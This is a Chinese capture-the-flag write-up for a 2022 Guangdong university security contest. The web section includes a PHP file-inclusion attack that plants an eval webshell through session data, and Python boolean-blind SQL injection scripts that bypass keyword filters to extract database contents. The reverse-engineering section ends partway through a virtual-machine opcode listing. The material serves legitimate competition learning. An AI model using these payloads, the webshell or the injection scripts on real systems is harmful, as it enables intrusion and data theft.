Writeup | 2022年第二届广东大学生网络安全攻防大赛-初赛

web

第一题easy_ctf

import re
import requests
def frequencySort(s: str):
    from collections import Counter
    return "".join([item * freq for item, freq in Counter(s).most_common()])
def getR(s:str):
    new_name = ''
    for char in frequencySort(s):
        if char not in new_name:  # 如果不在新的字符串中
            new_name += char  # 拼接到新字符串中的末尾
    return new_name[::-1]
url="http://120.79.191.238:47195"
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
   'Cookie':'PHPSESSID=srven1a0dqb9tnqg94ssg22sp5'}
res = requests.get(url=url,headers=header)
print(res.text)
pattern = re.compile(r'"1600">\r\n(.*?)<td>\r\n</tr>')
result_site = re.findall(pattern, res.text)
s=result_site[0]
for i in range(0,20):
     data = {"ans": getR(s)}
     res = requests.post(url=url, data=data,headers=header)
     if "输入错误,请输入正确结果" not in res.text:
          print(res.text)

他提交有时间限制，手动不太可能上脚本

flag{925e2ebe96725c75371fc60a5ab0ed1a}

第二题 in

文件读取
GET /action.php?file=php%3a%2f%2ffilter%2fconvert%2ebase64-encode%2fresource%3daction.php

<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
include($_GET['file']);
?>
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<a href=action.php?file=1.txt>my dairy</a>
<a href=action.php?file=2.txt>my booklist</a>
</body>
</html>

包含session
利用条件：session 文件路径已知，且其中内容部分可控。
PHP 默认生成的 Session 文件往往存放在 /tmp 目录下
/tmp/sessSESSIONID
?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
session 文件一般在 /tmp 目录下，格式为 sess[your phpsessid value]，有时候也有可能在 /var/lib/php5 之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制 session 的值，也许你能够获得一个 shell

包含自己的

可以看到为index.php提交的name
提交<?php eval($_POST[‘pass’]);?>

然后包含这session文件
GET /action.php?file=../../../../../../../../../../../../tmp/sess_39533e14cd0c2c580dc800a3db282f4d
蚁剑链接pass

第三题 easysql

https://www.yuque.com/challenger-sfhjb/qn3zo3/eznmqo
和之前类似https://www.cnblogs.com/gtx690/p/13292473.html
但不报错且多过滤了sleep和union
只能布尔注入
先发一个主题为2的广告
闭合payload：

2'/**/&&/**/if(1=2,'',1)='       //返回不正常
2'/**/&&/**/if(1=2,'',1)='       //返回正常

写脚本

import re

import requests
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
   'Cookie':'PHPSESSID=48ecda2b3befa5ceca4d4a5166ab1dfe'}
url2='http://120.79.141.85:48192/addads.php'
global cunt
cunt=0
flag = ""
def emptyAndAdd(cunt):
    # empty
    url0="http://120.79.141.85:48192/empty.php"
    res = requests.get(url=url0, headers=header)
    #add
    cunt=cunt+1
    data0 = {'title': 2, 'content': '888666ok', 'ac': 'add'}
    url1='http://120.79.141.85:48192/addads.php'
    res = requests.post(url=url1, data=data0, headers=header)
    return  cunt
def getid():
    # empty
    url5 = "http://120.79.141.85:48192/index.php"
    res = requests.get(url=url5, headers=header)
    idf= re.findall(r"<a href='detail\.php\?id=(.*?)'>", res.text)
    return idf[-1]

cunt=emptyAndAdd(cunt)
print("请求第"+str(cunt))
for i in range(1,100):
    low = 32
    high = 128
    while low < high:
        mid = (low + high)//2
        if cunt==9:
            cunt=0
            cunt=emptyAndAdd(cunt)
            # print("请求第" + str(cunt))
            print("-----------------------------------------------------------")
        # add
        cunt=cunt+1
        content = "select/**/user()"
        sql = f"2'/**/&&/**/if(ascii(substr(({content}),{i},1))<{mid},'',1)='"
        data2 = {'title': sql, 'content': 'ttt', 'ac': 'add'}
        print(sql)
        r = requests.post(url=url2, data=data2, headers=header)
        #print(cunt)
        #select
        url1 = f'http://120.79.141.85:48192/detail.php?id={int(getid())}'
        #print(url1)
        rest = requests.get(url=url1, headers=header)
        if "888666ok" in rest.text:#len(r.content) == 50811:
            high = mid
        else:
            low = mid + 1
    if low == high == 32:
        print("No  result")
        break
    flag += chr((high + low - 1)//2)
    print(flag)

select//load_file(‘/etc/passwd’)也可以读文件，但flag在数据库里

过滤了mysql.innodb_table_stats、information_schema.tables、sys.schema_auto_increment_columns、union
但没过滤sys.schema_table_statistics_with_buffer
上面脚本盲猜select//id//from//flag
存在
参考：
https://blog.csdn.net/weixin_43940853/article/details/106164162

import re

import requests
header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36",
   'Cookie':'PHPSESSID=824c09ba71fd6dd466f3c8511e9d1029'}
url2='http://120.79.141.85:48192/addads.php'
global cunt
cunt=0
def add(flag):
    res = ''
    res += flag
    return res
flag = 'flag{'


def emptyAndAdd(c):
    # empty
    url0="http://120.79.141.85:48192/empty.php"
    res = requests.get(url=url0, headers=header)
    #add
    cunt=c+1
    data0 = {'title': 2, 'content': '888666ok', 'ac': 'add'}
    url1='http://120.79.141.85:48192/addads.php'
    res = requests.post(url=url1, data=data0, headers=header)
    return cunt

def getid():
    # empty
    url5 = "http://120.79.141.85:48192/index.php"
    res = requests.get(url=url5, headers=header)
    #print(res.text)
    idf= re.findall(r"\.php\?id=(.*?)'>", res.text)
    return idf[-1]
import string
for i in range(1,200):
    for char in string.printable.encode():
        if cunt == 9:
            cunt = 0
            cunt = emptyAndAdd(cunt)
            # print("请求第" + str(cunt))
            print("-----------------------------------------------------------")
        # add
        cunt = cunt + 1
        hexchar = add(flag + chr(char))
        payload = '(select/**/1,"{}")>(select/**/*/**/from/**/flag)'.format(hexchar)
        sql = "2'/**/&&/**/if(({}),'',1)='".format(payload)
        # emptyAndAdd(0)
        data2 = {'title': sql, 'content': 'ttt', 'ac': 'add'}
        print(sql)
        r = requests.post(url=url2, data=data2, headers=header)
        if "标题含有敏感词汇" in r.text:
            continue
        # print(r.text)
        url1 = f'http://120.79.141.85:48192/detail.php?id={int(getid())}'
        #print(url1)
        rest = requests.get(url=url1, headers=header)
        # print(rest.text)
        if "888666ok" in rest.text:
            flag = add(flag + chr(char-1))
            print(flag)
            break

re

pyre

解包


反编译

解密

is this really vm

初步分析可以判定为虚拟机，并且他的指令形式为[offset1,offset2,offset3]。

利用py提取出他的程序执行流。

import time
def circular_shift_right(int_value, k, bit=8):
    bit_string = '{:0%db}' % bit
    print(bit_string)
    bin_value = bit_string.format(int_value)  # 8 bit binary
    print(bin_value)
    bin_value = bin_value[-k:] + bin_value[:-k]
    int_value = int(bin_value, 2)
    return int_value

def qufan(int_value,bit=16):
    bit_string = '{:0%db}' % bit
    #print(bit_string)
    bin_value = bit_string.format(int_value)  # 8 bit binary
    n=""
    for i in range(16):
        t=(ord(bin_value[i])-ord('0')+1)%2
        n+=chr(t+48)
    #print(n)
    int_value=int(n, 2)
    return int_value


def circular_shift_left(int_value, k, bit=16):
    bit_string = '{:0%db}' % bit
    bin_value = bit_string.format(int_value)  # 8 bit binary
    bin_value = bin_value[k:] + bin_value[:k]
    int_value = int(bin_value, 2)
    return int_value

def fun(val1,val2):
    a1=qufan(val1|qufan(val2))
    a2=qufan(qufan(val1)|val2)
    retval=a1|a2
    return retval

vmc=[6675, 6675, 7, 7, 7, 3, 312, 312, 7, 7, 7, 0, 314, 1, 313, 313, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 332, 332, 7, 7, 7, 0, 334, 1, 333, 333, 7, 7, 7, 4, 6663, 6663, 7, 7, 7, 3, 352, 352, 7, 7, 7, 0, 354, 1, 353, 353, 7, 7, 7, 4, 6679, 6679, 7, 7, 7, 3, 372, 372, 7, 7, 7, 0, 374, 1, 373, 373, 7, 7, 7, 4, 6677, 6677, 7, 7, 7, 3, 392, 392, 7, 7, 7, 0, 394, 1, 393, 393, 7, 7, 7, 4, 6671, 6671, 7, 7, 7, 3, 412, 412, 7, 7, 7, 0, 414, 1, 413, 413, 7, 7, 7, 4, 6676, 6676, 7, 7, 7, 3, 432, 432, 7, 7, 7, 0, 434, 1, 433, 433, 7, 7, 7, 4, 446, 446, 7, 7, 7, 0, 448, 455, 447, 447, 7, 7, 7, 0, 0, 461, 461, 7, 7, 7, 0, 463, 1, 462, 462, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6635, 481, 481, 7, 7, 7, 0, 483, 1, 482, 482, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6636, 501, 501, 7, 7, 7, 0, 503, 1, 502, 502, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6637, 521, 521, 7, 7, 7, 0, 523, 1, 522, 522, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6638, 541, 541, 7, 7, 7, 0, 543, 1, 542, 542, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6639, 561, 561, 7, 7, 7, 0, 563, 1, 562, 562, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6640, 581, 581, 7, 7, 7, 0, 583, 1, 582, 582, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6641, 601, 601, 7, 7, 7, 0, 603, 1, 602, 602, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6642, 621, 621, 7, 7, 7, 0, 623, 1, 622, 622, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6643, 641, 641, 7, 7, 7, 0, 643, 1, 642, 642, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6644, 661, 661, 7, 7, 7, 0, 663, 1, 662, 662, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6645, 681, 681, 7, 7, 7, 0, 683, 1, 682, 682, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6646, 701, 701, 7, 7, 7, 0, 703, 1, 702, 702, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6647, 721, 721, 7, 7, 7, 0, 723, 1, 722, 722, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6648, 741, 741, 7, 7, 7, 0, 743, 1, 742, 742, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6649, 761, 761, 7, 7, 7, 0, 763, 1, 762, 762, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6650, 781, 781, 7, 7, 7, 0, 783, 1, 782, 782, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6651, 801, 801, 7, 7, 7, 0, 803, 1, 802, 802, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6652, 821, 821, 7, 7, 7, 0, 823, 1, 822, 822, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6653, 841, 841, 7, 7, 7, 0, 843, 1, 842, 842, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6654, 861, 861, 7, 7, 7, 0, 863, 1, 862, 862, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6655, 881, 881, 7, 7, 7, 0, 883, 1, 882, 882, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6656, 901, 901, 7, 7, 7, 0, 903, 1, 902, 902, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6657, 921, 921, 7, 7, 7, 0, 923, 1, 922, 922, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6658, 941, 941, 7, 7, 7, 0, 943, 1, 942, 942, 7, 7, 7, 6, 5, 5, 7, 7, 7, 6659, 961, 961, 7, 7, 7, 0, 964, 0, 0, 6635, 6635, 962, 6605, 6605, 963, 976, 976, 7, 7, 7, 0, 979, 0, 0, 6635, 6635, 977, 963, 963, 978, 977, 978, 7, 7, 7, 7, 7, 7, 963, 1000, 1000, 7, 7, 7, 0, 1003, 0, 0, 6605, 6605, 1001, 962, 962, 1002, 1001, 1002, 7, 7, 7, 7, 7, 7, 962, 962, 963, 7, 7, 7, 6602, 1030, 1030, 7, 7, 7, 0, 1033, 0, 0, 6602, 6602, 1031, 6631, 6631, 1032, 1045, 1045, 7, 7, 7, 0, 1048, 0, 0, 6602, 6602, 1046, 1032, 1032, 1047, 1046, 1047, 7, 7, 7, 7, 7, 7, 1032, 1069, 1069, 7, 7, 7, 0, 1072, 0, 0, 6631, 6631, 1070, 1031, 1031, 1071, 1070, 1071, 7, 7, 7, 7, 7, 7, 1031, 1031, 1032, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6636, 6636, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 1291, 1291, 7, 7, 7, 0, 1294, 0, 0, 6602, 6602, 1292, 6607, 6607, 1293, 1306, 1306, 7, 7, 7, 0, 1309, 0, 0, 6602, 6602, 1307, 1293, 1293, 1308, 1307, 1308, 7, 7, 7, 7, 7, 7, 1293, 1330, 1330, 7, 7, 7, 0, 1333, 0, 0, 6607, 6607, 1331, 1292, 1292, 1332, 1331, 1332, 7, 7, 7, 7, 7, 7, 1292, 1292, 1293, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6637, 6637, 7, 7, 7, 6637, 1, 1, 7, 7, 7, 6602, 1378, 1378, 7, 7, 7, 0, 1381, 0, 0, 6602, 6602, 1379, 6608, 6608, 1380, 1393, 1393, 7, 7, 7, 0, 1396, 0, 0, 6602, 6602, 1394, 1380, 1380, 1395, 1394, 1395, 7, 7, 7, 7, 7, 7, 1380, 1417, 1417, 7, 7, 7, 0, 1420, 0, 0, 6608, 6608, 1418, 1379, 1379, 1419, 1418, 1419, 7, 7, 7, 7, 7, 7, 1379, 1379, 1380, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 1453, 1453, 7, 7, 7, 0, 1456, 0, 0, 6638, 6638, 1454, 6621, 6621, 1455, 1468, 1468, 7, 7, 7, 0, 1471, 0, 0, 6638, 6638, 1469, 1455, 1455, 1470, 1469, 1470, 7, 7, 7, 7, 7, 7, 1455, 1492, 1492, 7, 7, 7, 0, 1495, 0, 0, 6621, 6621, 1493, 1454, 1454, 1494, 1493, 1494, 7, 7, 7, 7, 7, 7, 1454, 1454, 1455, 7, 7, 7, 6602, 1522, 1522, 7, 7, 7, 0, 1525, 0, 0, 6602, 6602, 1523, 6624, 6624, 1524, 1537, 1537, 7, 7, 7, 0, 1540, 0, 0, 6602, 6602, 1538, 1524, 1524, 1539, 1538, 1539, 7, 7, 7, 7, 7, 7, 1524, 1561, 1561, 7, 7, 7, 0, 1564, 0, 0, 6624, 6624, 1562, 1523, 1523, 1563, 1562, 1563, 7, 7, 7, 7, 7, 7, 1523, 1523, 1524, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6639, 6639, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 1783, 1783, 7, 7, 7, 0, 1786, 0, 0, 6602, 6602, 1784, 6633, 6633, 1785, 1798, 1798, 7, 7, 7, 0, 1801, 0, 0, 6602, 6602, 1799, 1785, 1785, 1800, 1799, 1800, 7, 7, 7, 7, 7, 7, 1785, 1822, 1822, 7, 7, 7, 0, 1825, 0, 0, 6633, 6633, 1823, 1784, 1784, 1824, 1823, 1824, 7, 7, 7, 7, 7, 7, 1784, 1784, 1785, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6640, 6640, 7, 7, 7, 6640, 1, 1, 7, 7, 7, 6602, 1870, 1870, 7, 7, 7, 0, 1873, 0, 0, 6602, 6602, 1871, 6610, 6610, 1872, 1885, 1885, 7, 7, 7, 0, 1888, 0, 0, 6602, 6602, 1886, 1872, 1872, 1887, 1886, 1887, 7, 7, 7, 7, 7, 7, 1872, 1909, 1909, 7, 7, 7, 0, 1912, 0, 0, 6610, 6610, 1910, 1871, 1871, 1911, 1910, 1911, 7, 7, 7, 7, 7, 7, 1871, 1871, 1872, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6641, 6641, 7, 7, 7, 6641, 1, 1, 7, 7, 7, 6602, 1957, 1957, 7, 7, 7, 0, 1960, 0, 0, 6602, 6602, 1958, 6618, 6618, 1959, 1972, 1972, 7, 7, 7, 0, 1975, 0, 0, 6602, 6602, 1973, 1959, 1959, 1974, 1973, 1974, 7, 7, 7, 7, 7, 7, 1959, 1996, 1996, 7, 7, 7, 0, 1999, 0, 0, 6618, 6618, 1997, 1958, 1958, 1998, 1997, 1998, 7, 7, 7, 7, 7, 7, 1958, 1958, 1959, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6642, 6642, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 2218, 2218, 7, 7, 7, 0, 2221, 0, 0, 6602, 6602, 2219, 6622, 6622, 2220, 2233, 2233, 7, 7, 7, 0, 2236, 0, 0, 6602, 6602, 2234, 2220, 2220, 2235, 2234, 2235, 7, 7, 7, 7, 7, 7, 2220, 2257, 2257, 7, 7, 7, 0, 2260, 0, 0, 6622, 6622, 2258, 2219, 2219, 2259, 2258, 2259, 7, 7, 7, 7, 7, 7, 2219, 2219, 2220, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 2293, 2293, 7, 7, 7, 0, 2296, 0, 0, 6643, 6643, 2294, 6629, 6629, 2295, 2308, 2308, 7, 7, 7, 0, 2311, 0, 0, 6643, 6643, 2309, 2295, 2295, 2310, 2309, 2310, 7, 7, 7, 7, 7, 7, 2295, 2332, 2332, 7, 7, 7, 0, 2335, 0, 0, 6629, 6629, 2333, 2294, 2294, 2334, 2333, 2334, 7, 7, 7, 7, 7, 7, 2294, 2294, 2295, 7, 7, 7, 6602, 2362, 2362, 7, 7, 7, 0, 2365, 0, 0, 6602, 6602, 2363, 6606, 6606, 2364, 2377, 2377, 7, 7, 7, 0, 2380, 0, 0, 6602, 6602, 2378, 2364, 2364, 2379, 2378, 2379, 7, 7, 7, 7, 7, 7, 2364, 2401, 2401, 7, 7, 7, 0, 2404, 0, 0, 6606, 6606, 2402, 2363, 2363, 2403, 2402, 2403, 7, 7, 7, 7, 7, 7, 2363, 2363, 2364, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6644, 6644, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 2623, 2623, 7, 7, 7, 0, 2626, 0, 0, 6602, 6602, 2624, 6617, 6617, 2625, 2638, 2638, 7, 7, 7, 0, 2641, 0, 0, 6602, 6602, 2639, 2625, 2625, 2640, 2639, 2640, 7, 7, 7, 7, 7, 7, 2625, 2662, 2662, 7, 7, 7, 0, 2665, 0, 0, 6617, 6617, 2663, 2624, 2624, 2664, 2663, 2664, 7, 7, 7, 7, 7, 7, 2624, 2624, 2625, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 2698, 2698, 7, 7, 7, 0, 2701, 0, 0, 6645, 6645, 2699, 6603, 6603, 2700, 2713, 2713, 7, 7, 7, 0, 2716, 0, 0, 6645, 6645, 2714, 2700, 2700, 2715, 2714, 2715, 7, 7, 7, 7, 7, 7, 2700, 2737, 2737, 7, 7, 7, 0, 2740, 0, 0, 6603, 6603, 2738, 2699, 2699, 2739, 2738, 2739, 7, 7, 7, 7, 7, 7, 2699, 2699, 2700, 7, 7, 7, 6602, 2767, 2767, 7, 7, 7, 0, 2770, 0, 0, 6602, 6602, 2768, 6615, 6615, 2769, 2782, 2782, 7, 7, 7, 0, 2785, 0, 0, 6602, 6602, 2783, 2769, 2769, 2784, 2783, 2784, 7, 7, 7, 7, 7, 7, 2769, 2806, 2806, 7, 7, 7, 0, 2809, 0, 0, 6615, 6615, 2807, 2768, 2768, 2808, 2807, 2808, 7, 7, 7, 7, 7, 7, 2768, 2768, 2769, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6646, 6646, 7, 7, 7, 6646, 1, 1, 7, 7, 7, 6602, 2854, 2854, 7, 7, 7, 0, 2857, 0, 0, 6602, 6602, 2855, 6634, 6634, 2856, 2869, 2869, 7, 7, 7, 0, 2872, 0, 0, 6602, 6602, 2870, 2856, 2856, 2871, 2870, 2871, 7, 7, 7, 7, 7, 7, 2856, 2893, 2893, 7, 7, 7, 0, 2896, 0, 0, 6634, 6634, 2894, 2855, 2855, 2895, 2894, 2895, 7, 7, 7, 7, 7, 7, 2855, 2855, 2856, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6647, 6647, 7, 7, 7, 6647, 1, 1, 7, 7, 7, 6602, 2941, 2941, 7, 7, 7, 0, 2944, 0, 0, 6602, 6602, 2942, 6609, 6609, 2943, 2956, 2956, 7, 7, 7, 0, 2959, 0, 0, 6602, 6602, 2957, 2943, 2943, 2958, 2957, 2958, 7, 7, 7, 7, 7, 7, 2943, 2980, 2980, 7, 7, 7, 0, 2983, 0, 0, 6609, 6609, 2981, 2942, 2942, 2982, 2981, 2982, 7, 7, 7, 7, 7, 7, 2942, 2942, 2943, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6648, 6648, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 3202, 3202, 7, 7, 7, 0, 3205, 0, 0, 6602, 6602, 3203, 6611, 6611, 3204, 3217, 3217, 7, 7, 7, 0, 3220, 0, 0, 6602, 6602, 3218, 3204, 3204, 3219, 3218, 3219, 7, 7, 7, 7, 7, 7, 3204, 3241, 3241, 7, 7, 7, 0, 3244, 0, 0, 6611, 6611, 3242, 3203, 3203, 3243, 3242, 3243, 7, 7, 7, 7, 7, 7, 3203, 3203, 3204, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3277, 3277, 7, 7, 7, 0, 3280, 0, 0, 6649, 6649, 3278, 6628, 6628, 3279, 3292, 3292, 7, 7, 7, 0, 3295, 0, 0, 6649, 6649, 3293, 3279, 3279, 3294, 3293, 3294, 7, 7, 7, 7, 7, 7, 3279, 3316, 3316, 7, 7, 7, 0, 3319, 0, 0, 6628, 6628, 3317, 3278, 3278, 3318, 3317, 3318, 7, 7, 7, 7, 7, 7, 3278, 3278, 3279, 7, 7, 7, 6602, 3346, 3346, 7, 7, 7, 0, 3349, 0, 0, 6602, 6602, 3347, 6604, 6604, 3348, 3361, 3361, 7, 7, 7, 0, 3364, 0, 0, 6602, 6602, 3362, 3348, 3348, 3363, 3362, 3363, 7, 7, 7, 7, 7, 7, 3348, 3385, 3385, 7, 7, 7, 0, 3388, 0, 0, 6604, 6604, 3386, 3347, 3347, 3387, 3386, 3387, 7, 7, 7, 7, 7, 7, 3347, 3347, 3348, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 3421, 3421, 7, 7, 7, 0, 3424, 0, 0, 6650, 6650, 3422, 6623, 6623, 3423, 3436, 3436, 7, 7, 7, 0, 3439, 0, 0, 6650, 6650, 3437, 3423, 3423, 3438, 3437, 3438, 7, 7, 7, 7, 7, 7, 3423, 3460, 3460, 7, 7, 7, 0, 3463, 0, 0, 6623, 6623, 3461, 3422, 3422, 3462, 3461, 3462, 7, 7, 7, 7, 7, 7, 3422, 3422, 3423, 7, 7, 7, 6602, 3490, 3490, 7, 7, 7, 0, 3493, 0, 0, 6602, 6602, 3491, 6616, 6616, 3492, 3505, 3505, 7, 7, 7, 0, 3508, 0, 0, 6602, 6602, 3506, 3492, 3492, 3507, 3506, 3507, 7, 7, 7, 7, 7, 7, 3492, 3529, 3529, 7, 7, 7, 0, 3532, 0, 0, 6616, 6616, 3530, 3491, 3491, 3531, 3530, 3531, 7, 7, 7, 7, 7, 7, 3491, 3491, 3492, 7, 7, 7, 6602, 6602, 454, 7, 7, 7, 454, 6651, 6651, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 6602, 6602, 6602, 7, 7, 7, 6602, 1, 1, 7, 7, 7, 